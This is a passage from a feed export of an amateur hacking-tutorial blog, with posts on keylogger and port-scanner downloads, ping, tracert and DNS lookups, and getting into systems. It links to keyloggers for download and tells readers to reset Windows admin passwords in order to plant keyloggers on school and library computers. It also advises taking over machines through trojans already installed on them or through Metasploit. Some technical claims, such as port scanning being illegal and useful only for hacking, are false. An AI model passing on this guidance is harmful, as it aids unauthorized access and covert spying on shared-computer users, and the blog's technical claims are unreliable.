tag:blogger.com,1999:blog-76769274998953591472024-03-14T01:02:32.249-07:00Hacking Basics and TechniquesSimple and easy to understand TutorialsUnknownnoreply@blogger.comBlogger14125tag:blogger.com,1999:blog-7676927499895359147.post-85436465332353867472009-09-20T21:24:00.001-07:002009-09-20T21:24:43.897-07:00How to downlaod free Key loggers ?<ul><li><a href="http://acs.ist.psu.edu/misc/dirk-files/keystrokelog/keylogger.zip">keylogger.zip</a></li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/5skinntd.zip">5skinntd.zip</a>
</pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/g2kBIOSspoof.zip">g2kBIOSspoof.zip</a>
</pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/hooker24.zip">hooker24.zip</a>
</pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/hookthis.zip">hookthis.zip</a>
</pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/keycopy.zip">keycopy.zip</a>
</pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/keyghost_analyser_v1-00.zip">keyghost_analyser_v1</a>
</pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/keylog.zip">keylog.zip</a>
</pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/keyspy.exe">keyspy.exe</a>
</pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/keytrap3.zip">keytrap3.zip</a>
</pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/pb19c.zip">pb19c.zip</a>
</pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/pca.zip">pca.zip</a>
</pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/pca_net.zip">pca_net.zip</a>
</pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/pca_pro.zip">pca_pro.zip</a>
</pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/phantom2.zip">phantom2.zip</a>
</pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/skin.zip">skin.zip</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/keylogger/slog.zip">slog.zip</a></pre><br />
</li>
<li><br />
<table><tbody>
<tr><td><a href="http://www.thedayx.cz/items/files/progs/Keylogger/AdvancedIvisibleKeylogger18.rar">AdvancedIvisibleKeylogger18.rar</a><br />
</td></tr>
</tbody></table><br />
</li>
<li><br />
<table><tbody>
<tr><td><a href="http://www.thedayx.cz/items/files/progs/Keylogger/Keylogger_packet.zip">Keylogger_packet.zip</a><br />
</td></tr>
</tbody></table><br />
</li>
<li><br />
<table><tbody>
<tr><td><br />
</td><td><a href="http://www.thedayx.cz/items/files/progs/Keylogger/XP_advanced_keylogger.zip">XP_advanced_keylogger.</a><br />
</td></tr>
</tbody></table><br />
</li>
</ul>Unknownnoreply@blogger.com9tag:blogger.com,1999:blog-7676927499895359147.post-37090921224981139912009-09-20T21:18:00.000-07:002009-09-20T21:18:51.066-07:00How to Download Free Port Scanners?All contents provided here are only for educational purposes.<br />
<br />
I am giving you various types of port scanners. If you want something special you can mention here, i will provide you that as early as possible.<br />
<br />
<ul><li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/SKPortScanSetup.exe">SKPortScanSetup.exe</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/WifiScanner.tar.gz">WifiScanner.tar.gz</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/WinNessus.zip">WinNessus.zip</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/abcp.zip">abcp.zip</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/antfree.zip">antfree.zip</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/dbtrial.exe">dbtrial.exe</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/ipscan218.exe">ipscan218.exe</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/ipscanner.exe">ipscanner.exe</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/jmap-0.3.1.src.tar.gz">jmap-0.3.1.src.tar.gz</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/linux-Vuln-source.zip">linux-Vuln-source.zip</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/mac_Vuln_Scanner.zip.rar">mac_Vuln_Scanner.zip</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/mpscan-0.1.0.tar.gz">mpscan-0.1.0.tar.gz</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/nat10.tar.gz">nat10.tar.gz</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/nessus.zip">nessus.zip</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/nessuswx-1.4.4.rar">nessuswx-1.4.4.rar</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/netmon160.exe">netmon160.exe</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/nmap-2.54BETA36.tgz">nmap-2.54BETA36.tgz</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/portinav.exe">portinav.exe</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/portscan.exe">portscan.exe</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/probe-4.1.tar.gz">probe-4.1.tar.gz</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/psad-1.2.1.tar.gz">psad-1.2.1.tar.gz</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/scanner.zip">scanner.zip</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/sms_alert.tar.gz">sms_alert.tar.gz</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/tcp-ps.zip">tcp-ps.zip</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/thc-hb09.zip">thc-hb09.zip</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/thc-ts20scan.zip">thc-ts20scan.zip</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/thportscan.zip">thportscan.zip</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/ultima-port-scanner.exe">ultima-port-scanner.exe</a></pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/whereisip2.2.exe">whereisip2.2.exe</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/windows_Port_Scanner.zip">windows_Port_Scanner</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/windows_Trojan_Scanner.zip">windows_Trojan_Scanner</a> </pre><br />
</li>
<li><br />
<pre><a href="http://cd.textfiles.com/htoolbox/scanner/xsharez2.zip">xsharez2.zip</a> </pre><br />
</li>
</ul>Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-7676927499895359147.post-42889485682335459092008-10-09T10:44:00.000-07:002008-10-09T11:16:46.040-07:00Ethical Hacking booksTo download books right click and save target as in Internet explorer and save link as Mozilla Firefox<br /><br /><br /><a href="http://www.eccouncil.org/ipdf/EthicalHacker.pdf">Ethical Hacking and Counter Measures</a><br /><br /><a href="http://www.centroatl.pt/titulos/tecnologias/imagens/e-book-ca-corporate-security-excerpt.pdf">The Ethical Hacking guide to cooperate Security</a><br /><br /><br /><a href="http://www.gov.mu/portal/sites/csd/doc/elaheebocus.pdf">Ethical Hacking Workshop</a><br /><br /><br /><a href="http://media.wiley.com/product_data/excerpt/4X/07645578/076455784X.pdf">Introduction to ethical Hacking</a><br /><br /><br /><a href="http://www.bcs.org/upload/pdf/ethical-hacking.pdf">Ethical Hacking Terminology</a><br /><br /><br /><a href="http://pdf.textfiles.com/security/palmer.pdf">Ethical Hacking</a>Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-7676927499895359147.post-91745186975418699982008-09-04T00:47:00.000-07:002008-09-04T07:04:40.256-07:00Hack Windows Admin<span style="font-weight: bold; color: rgb(255, 102, 0);">Step by Step procedure to hack windows password.</span><br /><br />Using this tutorial ,You can change and reset <a href="http://en.wikipedia.org/wiki/Password">password </a>of admin.<br /><br />What's the need?<br /><br />1.Forgot passwords!<br />Many people forgot their password and lost their <a href="http://en.wikipedia.org/wiki/Wikipedia:Administrators">administrator</a> rights.<br /><br /><br />2.As i told you in post "<a href="http://5steps2hack.blogspot.com/2008/07/learn-hacking-in-5-easy-steps.html">basics of hacking</a>" ,before attacking we need to prepare our defense.<br /><br />By using given methods , even beginner will get administrative rights and will able to install <a href="http://5steps2hack.blogspot.com/2008/07/simple-technique-to-get-others-user.html">keyloggers</a> and <a href="http://how-to-answers.blogspot.com/2008/07/tools-of-hacking.html">other tool</a> in computer's at public libraries of school and colleges.<br /><br />This hack hardly takes 2 minutes. Follow these steps :<br /><br />1. Open Start and click Run as shown in the pic<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUP8WUOZ7LIFm4kEF9eRsDoioDK-g_z5uXUn0ySF1nbxvplHrpFiErXvV-DpmlxV1yLA75-6VKEkIpyD5akaginNm0lIEY2FX5W8y8dgAz_hQLTDKOq5SwAf6uhBOB8nhrzZ_-0-6UftMa/s1600-h/window+admin+hacking.JPG"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUP8WUOZ7LIFm4kEF9eRsDoioDK-g_z5uXUn0ySF1nbxvplHrpFiErXvV-DpmlxV1yLA75-6VKEkIpyD5akaginNm0lIEY2FX5W8y8dgAz_hQLTDKOq5SwAf6uhBOB8nhrzZ_-0-6UftMa/s400/window+admin+hacking.JPG" alt="" id="BLOGGER_PHOTO_ID_5242156221941935698" border="0" /></a><br /><br />2. Type command( in red color) "<span style="color: rgb(255, 0, 0);">control userpasswords2</span>" in run window and press ok.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyDaZc-mpJ69blbG8IcQv7jW1ZwNWFzEP7oQCPfqu3jBzUSouh87l-wHMYfEJF6wibkNLiuIB4QdgjqD0viknkoXLzTGOGkFWF3O7VQkrntJyADNMNSrxFHZAWFakJoPhyphenhyphenJmvJOm-MN-4U/s1600-h/second.JPG"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyDaZc-mpJ69blbG8IcQv7jW1ZwNWFzEP7oQCPfqu3jBzUSouh87l-wHMYfEJF6wibkNLiuIB4QdgjqD0viknkoXLzTGOGkFWF3O7VQkrntJyADNMNSrxFHZAWFakJoPhyphenhyphenJmvJOm-MN-4U/s400/second.JPG" alt="" id="BLOGGER_PHOTO_ID_5242155726712274098" border="0" /></a><br /><br />3. It will pop up User account Windows, in this window click on administrator.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguVHpYQYSpHzKJZorFt_01CJMyXJMFsUPCcbnfx1PDlyuFbh53C8IEtz-YJCF5xo0wRBDug8MWElFlwc_nFH21U1ZsWh0rTWsZiU8dWyeAQlVBDrkqYTklM_3Vo1m5ylP-vCSTbsesLcMe/s1600-h/window+admin+pass3.JPG"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguVHpYQYSpHzKJZorFt_01CJMyXJMFsUPCcbnfx1PDlyuFbh53C8IEtz-YJCF5xo0wRBDug8MWElFlwc_nFH21U1ZsWh0rTWsZiU8dWyeAQlVBDrkqYTklM_3Vo1m5ylP-vCSTbsesLcMe/s400/window+admin+pass3.JPG" alt="" id="BLOGGER_PHOTO_ID_5242155714322848514" border="0" /></a><br /><br />Click on Reset Password Button, here we are! , change password according to you and become administrator.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-j8Lo_TXVfen_KA6a6PAcFJ5E-Z9MCSs08dmlAXzOJL7x2zdDjoHBF48_A3qo6nYGgzQZDQOuUVJ55EDMR1ljo4CFwXXC4KjQkWPmjXP186ZHitJ81fZNNpDPxq7UZf0ciBy6xeY6mc-X/s1600-h/window+admin4.JPG"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-j8Lo_TXVfen_KA6a6PAcFJ5E-Z9MCSs08dmlAXzOJL7x2zdDjoHBF48_A3qo6nYGgzQZDQOuUVJ55EDMR1ljo4CFwXXC4KjQkWPmjXP186ZHitJ81fZNNpDPxq7UZf0ciBy6xeY6mc-X/s400/window+admin4.JPG" alt="" id="BLOGGER_PHOTO_ID_5242155722087869394" border="0" /></a><br /><br /><br />I hope it helps<br /><br />cheers<br /><br />cgUnknownnoreply@blogger.com4tag:blogger.com,1999:blog-7676927499895359147.post-8329928075636170272008-08-22T23:50:00.000-07:002008-09-06T12:03:56.277-07:00change look's of google page<p></p><embed src="http://www.youtube.com/v/gsv2g8BdRCo&hl=" fs="1" type="application/x-shockwave-flash" allowfullscreen="true" height="344" width="425"></embed><p></p><p>Video tutorial which is quiet easier to understand.</p>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-7676927499895359147.post-8684844844704235652008-08-22T23:44:00.000-07:002008-09-06T12:04:23.406-07:00Google hack VideoGoogle hacking is one of the most simplest technique of Hacking.Google is very powerful tool of hacking and it is very hacking friendly too.<br /><br /><embed src="http://www.youtube.com/v/_VWXaBq--eg&hl=" fs="1" type="application/x-shockwave-flash" allowfullscreen="true" height="344" width="425"></embed><br /><br /><span style="font-weight: bold; color: rgb(255, 102, 0);">Other related :-</span><br /><a href="http://5steps2hack.blogspot.com/2008/08/change-looks-of-google-page.html">Change the look of google home page</a><br /><a href="http://how-to-answers.blogspot.com/2008/08/rip-mp3-from-youtube-video.html">Rip mp3 from Youtube</a>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7676927499895359147.post-19099783619179393392008-07-25T20:55:00.000-07:002009-07-09T14:59:10.276-07:00Using vulnerabilities for HackingFirst of all we need to know the list of open ports using <a href="http://5steps2hack.blogspot.com/2008/07/using-port-scanning-for-hacking.html">Port Scanner</a>.<br /><br /><a href="http://www.sans.org/resources/idfaq/oddports.php">Complete list of ports used by trojan</a><br /><br />Suppose we find that <a href="http://searchnetworking.techtarget.com/sDefinition/0,,sid7_gci212811,00.html/">port number</a> "1080" is open, we search it in above list of <a href="http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29">trojan </a>ports.<br />we find that 1083 is vulnerabilities related to <a href="http://www.glocksoft.com/trojan_list/WinHole.htm">winhole.</a><br /><br />How to use this vulnerabilities?<br /><br />It is much easier than what we have done in port Scanning , now search in google about this <a href="http://www.auditmypc.com/port/tcp-port-1080.asp">1080 port.</a><br /><br />Download<a href="http://www.metasploit.com/framework/download/"> Metasploit framework</a> from internet.<br /><br />To use Metasploit framework you need good tutorial with images.<br />And one of the best tutorial available about metasploit is<a href="http://www.windowsecurity.com/articles/Web-Server-Defacements-Part2.html"> </a><a href="http://www.windowsecurity.com/articles/Web-Server-Defacements-Part2.html">Don Parker's </a><a href="http://www.windowsecurity.com/articles/Web-Server-Defacements-Part2.html">.</a><br /><br />you can use this framework to hack any system with any vulnerable port open.Unknownnoreply@blogger.com8tag:blogger.com,1999:blog-7676927499895359147.post-25388924771333746102008-07-25T10:03:00.000-07:002008-07-25T10:35:53.390-07:00Using Port Scanning for HackingOne of the most popular and sometime necessary method is port scanning. It is one of the easiest way to to find out vulnerabilities in the system. But as you know more easier the method more are the risks.<br /><br />Note:-<a href="http://en.wikipedia.org/wiki/Portscanning">Port scanning</a> is illegal. All methods like telnet, ping dns query are legal but port scanning is not.<br /><br />Why?<br />I know, u wanna ask me this question. The reason behind is that this method is only used for the hacking purposes. There is not any other use of it.<br /><br />What actually <a href="http://www.foundstone.com/us/resources/proddesc/superscan4.htm">Port scanner</a> do?<br /><a href="http://www.foundstone.com/us/resources/proddesc/superscan4.htm">Port Scanner</a> find out open ports of the target computer.<br />List of some free Port Scanner's available for <a href="http://how-to-answers.blogspot.com/2008/07/download-free-port-scanners.html">download.</a><br /><br />What can we do with open<a href="http://www.iana.org/assignments/port-numbers"> ports</a>?<br />We do everything, because this is the most valuable information of the target computer.<br />I explain you how :-<br />Suppose we find out "x" port open.<br />We search in google about x number port.<br />We find out that it is open because of trojan. Then we do not need to do anything extra for hacking. We use already installed trojan for our hacking work. We use server version of that trojan to get access on target computer.<br /><br /><a href="http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers">List of Tcp and Udp ports</a>Unknownnoreply@blogger.com526tag:blogger.com,1999:blog-7676927499895359147.post-36785390820703213682008-07-25T06:23:00.000-07:002008-07-25T06:50:39.040-07:00DNS Query use to find IP Address<a href="http://technet2.microsoft.com/windowsserver/en/library/0bcd97e6-b75d-48ce-83ca-bf470573ebdc1033.mspx?mfr=true">DNS Query</a> is Domain Name system Query.<br /><a href="http://en.wikipedia.org/wiki/Domain_Name_System"><br />Domain Name system</a> is a server who stores <a href="http://en.wikipedia.org/wiki/Ip_address">IP address</a> of each website.<br />And we will learn to use tools for getting <a href="http://en.wikipedia.org/wiki/Ip_address">IP address</a> from DNS server.<br /><br />We will use here<a href="http://www.webmaster-toolkit.com/dns-query.shtml"> Webmasters-Toolkit</a>.<br /><br />1. First of all we will open the site <a href="http://www.webmaster-toolkit.com/dns-query.shtml">Webmasters-Toolkit</a> , and write URL of our target Site. Here I am targeting my blog "5steps2hack.blogspot.com".<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgHdNuNxG6nCPHaoEK5N4ksM74zdizw6Rz2EGXnKONBiQwDtirltNDOsRdzjXyBvrLE9qlMFi1DPrY9Vy0AbDl3GnU4UGMCxggYgen8bxfyFkGN03TdmusDngUfitQp-VZ1IR9Lm7rSSzb/s1600-h/dns+hack.JPG"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgHdNuNxG6nCPHaoEK5N4ksM74zdizw6Rz2EGXnKONBiQwDtirltNDOsRdzjXyBvrLE9qlMFi1DPrY9Vy0AbDl3GnU4UGMCxggYgen8bxfyFkGN03TdmusDngUfitQp-VZ1IR9Lm7rSSzb/s400/dns+hack.JPG" alt="" id="BLOGGER_PHOTO_ID_5226948433484350018" border="0" /></a><br /><br />2.After executing the query we noticed that this blog do not have its own IP Address , because it is one of the directory of server whose owner is google.com. We know that google is the owner of <a href="http://www.blogger.com">blogger.com</a> , and here too ip address which is given is <a href="http://www.google.com">google's</a> ip address. We will prove it in third step. For now it is sufficient for us to know that ip address we find is http://209.85.133.191/<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA8v6si0ZdCHzSQYeH3BpBikQ1IxidNbkXIm6ffNgVjlq0o5k27FXQTR-hoiqN1hSLT3K3OYk19hn2j77aocl-b00W_0BPuiTl9Pxd4IP4qtcpdbHwmG9jl7Reg_2CytrKAbPR4axkNMw0/s1600-h/dns+hack1.JPG"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA8v6si0ZdCHzSQYeH3BpBikQ1IxidNbkXIm6ffNgVjlq0o5k27FXQTR-hoiqN1hSLT3K3OYk19hn2j77aocl-b00W_0BPuiTl9Pxd4IP4qtcpdbHwmG9jl7Reg_2CytrKAbPR4axkNMw0/s400/dns+hack1.JPG" alt="" id="BLOGGER_PHOTO_ID_5226947607025110706" border="0" /></a><br /><br /><br />3.I used here the same address http://209.85.133.191/ and see the result. It proves that DNS is one of the best way to get information about server as well as IP address.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh82D5_pUkklERZOnAyXRF-hD7kIQo6WywHe_lhPfrLCToUSSHOugChl2lpinbyLoKTVTPn52XYQeQXHjzfPef7uEnDfNbCfsBdnY5kFS5bFTpOU5sZWDgmdRDaUULqece6nlAJTzIOWUqx/s1600-h/dns+hack2.JPG"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh82D5_pUkklERZOnAyXRF-hD7kIQo6WywHe_lhPfrLCToUSSHOugChl2lpinbyLoKTVTPn52XYQeQXHjzfPef7uEnDfNbCfsBdnY5kFS5bFTpOU5sZWDgmdRDaUULqece6nlAJTzIOWUqx/s400/dns+hack2.JPG" alt="" id="BLOGGER_PHOTO_ID_5226947934661833154" border="0" /></a>Unknownnoreply@blogger.com13tag:blogger.com,1999:blog-7676927499895359147.post-33831752457923040742008-07-25T06:09:00.000-07:002008-07-25T10:42:23.001-07:00How to use tracert?Practical use of <a href="http://en.wikipedia.org/wiki/Traceroute">Tracert</a> :-<br /><ul><li>Get Ip address of the target system.</li><li>To find out location so we get some idea about current time of target system.</li></ul><br />First of all open Command prompt from Program->Accesories-> command Prompt<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxPCyZYCskhZskYZn98F5lXanciQh6F6SQYCAaBNN51MFO4rpsVjhiZlSFKWkeeu4MDrNHqc2E9m_3ovjOLzj-FaTE8OFvLMYELdabKvVWDpznbtFpZyTX0lsxbC1j18ZGK_2DytejBHE1/s400/Ping+hack1.JPG"><img style="cursor: pointer; width: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxPCyZYCskhZskYZn98F5lXanciQh6F6SQYCAaBNN51MFO4rpsVjhiZlSFKWkeeu4MDrNHqc2E9m_3ovjOLzj-FaTE8OFvLMYELdabKvVWDpznbtFpZyTX0lsxbC1j18ZGK_2DytejBHE1/s400/Ping+hack1.JPG" alt="" border="0" /></a><br /><br />2. Use command " tracert us.rd.yahoo.com" us.rd.yahoo.com is server of yahoo in India.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjExG0C97HxpeWBBtzLIrH9hF_Btt5lXzbMeapqRdf60rJyHE_0CSfojroGs1w1HmuRFJukLSGAD06e_G0zyaRTNcmDNqDure8Aq0UUFp9myYRsZs5eBqkg8RbRDuM0AVRSiQYHEsOYsa0M/s1600-h/tracert+hack1.JPG"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjExG0C97HxpeWBBtzLIrH9hF_Btt5lXzbMeapqRdf60rJyHE_0CSfojroGs1w1HmuRFJukLSGAD06e_G0zyaRTNcmDNqDure8Aq0UUFp9myYRsZs5eBqkg8RbRDuM0AVRSiQYHEsOYsa0M/s400/tracert+hack1.JPG" alt="" id="BLOGGER_PHOTO_ID_5226939490434062930" border="0" /></a><br /><br /><br /><br />3. We will see if we get <a href="http://en.wikipedia.org/wiki/Ip_address">ip address</a>.<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGW7ddxAht8fZy4eHr-G55MFCV0vJwmEIuI6COwgM_01GL6rRWkw_ScBQhHXc7lxAP3t69lsbWC_y9eBmgv1RXU7RfQqYaFVnOClsMqwl-wNXON0XYL_0TVk_Ymy8AQcD3p_8aROSZmT9y/s1600-h/tracert+hack2.JPG"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGW7ddxAht8fZy4eHr-G55MFCV0vJwmEIuI6COwgM_01GL6rRWkw_ScBQhHXc7lxAP3t69lsbWC_y9eBmgv1RXU7RfQqYaFVnOClsMqwl-wNXON0XYL_0TVk_Ymy8AQcD3p_8aROSZmT9y/s400/tracert+hack2.JPG" alt="" id="BLOGGER_PHOTO_ID_5226940364961895538" border="0" /></a><br /><br /><a href="http://www.windowsnetworking.com/articles_tutorials/Using-Tracert.html">Windows Networking article about tracer route</a>Unknownnoreply@blogger.com13tag:blogger.com,1999:blog-7676927499895359147.post-68305225439166796962008-07-25T05:38:00.000-07:002008-07-25T05:59:55.611-07:00Use of Ping to get IP AddressPing is one of the easiest way to get IP address.<br /><br />We need three steps to learn this method :-<br /><br /><ol><li>Open Command prompt from start-> Program-> Accecories -> command prompt<br /></li></ol><ol><li><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxPCyZYCskhZskYZn98F5lXanciQh6F6SQYCAaBNN51MFO4rpsVjhiZlSFKWkeeu4MDrNHqc2E9m_3ovjOLzj-FaTE8OFvLMYELdabKvVWDpznbtFpZyTX0lsxbC1j18ZGK_2DytejBHE1/s1600-h/Ping+hack1.JPG"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxPCyZYCskhZskYZn98F5lXanciQh6F6SQYCAaBNN51MFO4rpsVjhiZlSFKWkeeu4MDrNHqc2E9m_3ovjOLzj-FaTE8OFvLMYELdabKvVWDpznbtFpZyTX0lsxbC1j18ZGK_2DytejBHE1/s400/Ping+hack1.JPG" alt="" id="BLOGGER_PHOTO_ID_5226933567379197618" border="0" /></a></li></ol><br />2.write "ping website name" on c prompt to get its ip<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNV-40hczDT6hyvSlZkSVLEuPR7QJSAtIKo_hqolAcSwR3EYSthG7iFMTUkBAyFpOP5GqGQTVvWKcDkIRuVgaBdUQQkm3qM_kUHn1n-u3sSD8pglOr90smlG-01REYK5gsMkg1SPR4Udjj/s1600-h/ping+hack2.JPG"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNV-40hczDT6hyvSlZkSVLEuPR7QJSAtIKo_hqolAcSwR3EYSthG7iFMTUkBAyFpOP5GqGQTVvWKcDkIRuVgaBdUQQkm3qM_kUHn1n-u3sSD8pglOr90smlG-01REYK5gsMkg1SPR4Udjj/s400/ping+hack2.JPG" alt="" id="BLOGGER_PHOTO_ID_5226934563377439730" border="0" /></a><br /><br /><br />3. We noticed that Ip address of google.com is 64.233.167.99. Now its time to check whether we are right .<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqMRoIrqRvnrfO8s6Xly7KGBk4RbcBVfOgmoLhV-0h2_YzUO0lOEB6MeNWCYUQzrLt_GvVb5oxH-TTAHdTvC_xR_BGApryMcLLc51lYxJK_EkNN4O8lw9UIQzyFHNLbnyIWjH57-oKZiZi/s1600-h/ping+hack3.JPG"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqMRoIrqRvnrfO8s6Xly7KGBk4RbcBVfOgmoLhV-0h2_YzUO0lOEB6MeNWCYUQzrLt_GvVb5oxH-TTAHdTvC_xR_BGApryMcLLc51lYxJK_EkNN4O8lw9UIQzyFHNLbnyIWjH57-oKZiZi/s400/ping+hack3.JPG" alt="" id="BLOGGER_PHOTO_ID_5226935242041029778" border="0" /></a>Unknownnoreply@blogger.com19tag:blogger.com,1999:blog-7676927499895359147.post-6306177450110545402008-07-25T05:22:00.000-07:002008-07-25T05:37:25.084-07:00What is Hacking?Hacking is a technique to get access on other computer without its permission or we can say without using the ways which are available and developing own ways of doing it.<br /><br />Ethical Hackers :- These are the Hacker who has got permission from the organization to hack their systems.<br /><br />Things we need?<br /><br />To learn Hacking we need target computer.<br /><br />There are two ways to reach at target computer :-<br /><br /><ul><li>Physically</li><li>Using wires ( Either <a href="http://en.wikipedia.org/wiki/Lan">lan</a>, <a href="http://en.wikipedia.org/wiki/Wide_area_network">wan</a> or<a href="http://www.google.co.in/url?sa=t&ct=res&cd=1&url=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FInternet&ei=5caJSJLzHZO26gPSn5m3Dg&usg=AFQjCNGNVC19Tq4feZi_31ubTYcYXLgWEQ&sig2=TlqMeKjZJphfG8uILj_LwA"> internet</a>)</li></ul>Physically :- we need to at the place where computer has. To go there we need Address of that place.<br /><br />Using wires :- Again we need to reach near our target computer. Here too we need address and this time address of a computer is its <a 